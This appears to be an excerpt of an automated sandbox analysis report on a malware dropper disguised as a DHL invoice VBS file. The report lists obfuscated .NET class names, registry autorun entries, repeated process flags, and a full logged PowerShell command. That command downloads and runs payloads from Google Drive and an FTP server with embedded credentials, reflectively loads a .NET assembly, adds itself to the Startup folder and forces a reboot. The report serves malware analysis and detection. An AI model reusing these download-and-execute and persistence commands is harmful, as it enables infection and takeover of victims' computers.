                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00406EEB ShellExecuteW,URLDownloadToFileW,23_2_00406EEB

                    Boot Survival

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,23_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
